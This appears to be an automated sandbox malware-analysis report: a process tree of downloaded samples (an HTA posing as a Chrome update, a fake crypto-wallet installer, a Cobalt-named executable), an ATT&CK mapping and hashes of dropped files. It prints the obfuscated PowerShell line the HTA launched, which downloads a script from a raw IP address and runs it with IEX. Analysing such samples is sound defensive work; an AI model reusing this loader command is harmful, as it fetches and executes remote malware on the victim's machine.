  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1068 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:1872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6116 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:5068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5968 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5656 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:3092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6104 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5924 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5540 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:5004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5560 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:1952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5960 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:2752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5512 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5848 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:1540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:2736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5924 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:3940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5512 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4696
- C:\Users\Admin\Downloads\file1.exe
  "C:\Users\Admin\Downloads\file1.exe"
  2⤵
  - Executes dropped EXE
  PID:4860
- C:\Users\Admin\Downloads\file2.exe
  "C:\Users\Admin\Downloads\file2.exe"
  2⤵
  - Executes dropped EXE
  PID:2132
- C:\Users\Admin\Downloads\file3.exe
  "C:\Users\Admin\Downloads\file3.exe"
  2⤵
  - Executes dropped EXE
  PID:4608
- C:\Users\Admin\Downloads\file4.exe
  "C:\Users\Admin\Downloads\file4.exe"
  2⤵
  - Executes dropped EXE
  PID:1660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5864 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1664 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:3184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5936 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:3704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=940 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:3880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5872 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:3632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5968 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:3876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4980 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:5024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5772 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3932 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5988 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3920 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:2236
- C:\Users\Admin\Downloads\Unc4191bggjiiabbh4_browsingExe.exe
  "C:\Users\Admin\Downloads\Unc4191bggjiiabbh4_browsingExe.exe"
  2⤵
  - Executes dropped EXE
  PID:3784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:1856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5076 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4664
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\Apt3bghahedghc1_browsingDocx.docx" /o ""
  2⤵
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:1804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6016 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:3348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5028 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:2136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1708 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:3340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5572 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4836
- C:\Users\Admin\Downloads\Cobaltbghdbghich1_browsing7Exe.exe
  "C:\Users\Admin\Downloads\Cobaltbghdbghich1_browsing7Exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:436
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:166644

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1224

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4000

C:\Users\Admin\Downloads\cryptowalletinstaller.exe
"C:\Users\Admin\Downloads\cryptowalletinstaller.exe"
1⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
PID:4848

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Modernloadbggbjehdcf31_browsingZip\" -spe -an -ai#7zMap29359:130:7zEvent1257
1⤵
PID:2788

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\Modernloadbggbjehdcf31_browsingZip\Chrome Setup Update.google.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
PID:440
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/31.41.244.231/AVAVA/WAW/F0.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');IEX $TC|IEX
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  PID:4784

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1448
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Modernloadbggbjehdcf31_browsingZip\Chrome Setup Update.google.hta
  2⤵
  PID:4432

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Cybersecurity\" -spe -an -ai#7zMap2400:88:7zEvent2250
1⤵
PID:3096

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\Cybersecurity\OpenAI for Cybersecurity.pdf"
1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3244
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
  2⤵
  PID:2184
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F27318592469EA1548277AAE5244A8A0 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    PID:2360
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E1CDB89C4FEE800CCA8C40EEC636915B --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E1CDB89C4FEE800CCA8C40EEC636915B --renderer-client-id=2 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job /prefetch:1
    3⤵
    PID:3376
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9DA6E2F19370A3AE3BBF908E05D76C31 --mojo-platform-channel-handle=2208 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    PID:4520
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=575342AC20465DB22BBD1721B7DB7391 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=575342AC20465DB22BBD1721B7DB7391 --renderer-client-id=5 --mojo-platform-channel-handle=2228 --allow-no-sandbox-job /prefetch:1
    3⤵
    PID:4452
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=031B2BFF0707145AF1BCEF58B7B2F89B --mojo-platform-channel-handle=1780 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    PID:3604
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1597D848D0E0F5972B1456C18C0ECD6A --mojo-platform-channel-handle=2312 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    PID:3880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
01ab66b00f91f160b51a3bda2d55679f

SHA1
0999246ba5dba5143223ae51156bc94375b5603d

SHA256
c8705c27d1472cf2f029ea2d2186723adbb249c573f2b18830f6a49340b7035a

SHA512
9bf19f851ea78f385aff2029cde1ee7a2e2305c8dedfe4fabd0b49a1aaeba282567eef90b452bc872519a455beb638c8aa42e398ccca1153add600beb35e0294

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
0ef85492160b738ff23d4bcc269635b1

SHA1
6490c484c6e634d86136d37e63aa9d40b2f72ff4

SHA256
24b3e199f5fa9247df59b33448d8838ffa0a0984554dc809a488d96f3b31eeeb

SHA512
6e62c4ecc157ae16c281fbf77e4c679ab9554feb333a34fc49edf37a0b684dd046caae7c696c7e8b28d0804ad70a32ec92b6635784a7c7d89327d36be2602f91

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
d02392faada3233bf4dc6ba7d1654ab5

SHA1
0c9a9fe56bab3ae2216327b8a9e8039a86599016

SHA256
c12ca9d5095c7e1e88c8b747c319c9ddad3efa6637b0fc323e63710436d92bf0

SHA512
8eff70fc758df4a3eeb3cef32f219c0e53324ad93137ea58cff070de848da9a8f41fac5e5396d5b8d041aae2030d900bc4ce6c12dafd4206ef0952e70bf5fb62

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
1d5bbe5339c116aca0f820f636695d9f

SHA1
3671cf54f5208e571b22771dc41f7d424a660d6f

SHA256
3a08948822b653515f57aaa53f9f6fcd79c755d8948eb234d3b781d0f04b59a8

SHA512
ddce7689b4e185654a0e094be0e506ad54d7cc6e7db1ca4f694b35605a4fb3b0a4233a18e7b50d95b66128f278e84f0f9e7009cbf89309e9b3072e2229880d1e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
63ed66f0a183f225918fa9b8918069ca

SHA1
7d60b8eed5e963be45baa7d04282965d9bc9b651

SHA256
506fa1c8093d86be21f26378e3b8c440c4cb5b5c1d197db24bfbd083cb50e2dd

SHA512
8dc724100c84a2f327fab6f9d124342b5633fc5add290f0d134373e4d7a1e4aa032de323314238b7af91b5fed733472aa7a57f086e2db9ef4e6d707177e5a65a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
15b6878a5d1998a404cc3a3694621392

SHA1
a310c5a0f5d7a334e14d1b1ff0b573917b01691b

SHA256
f1216d8a037984fb36468369d62f7e28afaa8ec6db259bc8982d0f14358d8f86

SHA512
cdc15f713095cddb357d8532000ceed0096cb26000240016ad566ddac947dbbcc06cafc83d9cc8f11b6700428f61d892608c631e5ee10d4c5d449e661dcfc4a9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
4c4af564701970f7d48ce28361108be8

SHA1
1d25df94961ec2ded94b7a5aba67f02ef018e9a9

SHA256
a61615327a72d68a0d6a3b5a087920920bc0aaf7b2b351e968a3bd32094e0a2e

SHA512
14c3b32208b28e17f43a3e8e16382f9d404f08b76bf8e44652c502074e561d0bed3c765fb17a5e551ad5c725e0d1ca43fec8ea2d12065fcd544bc4e61a9f0446

Download Submit
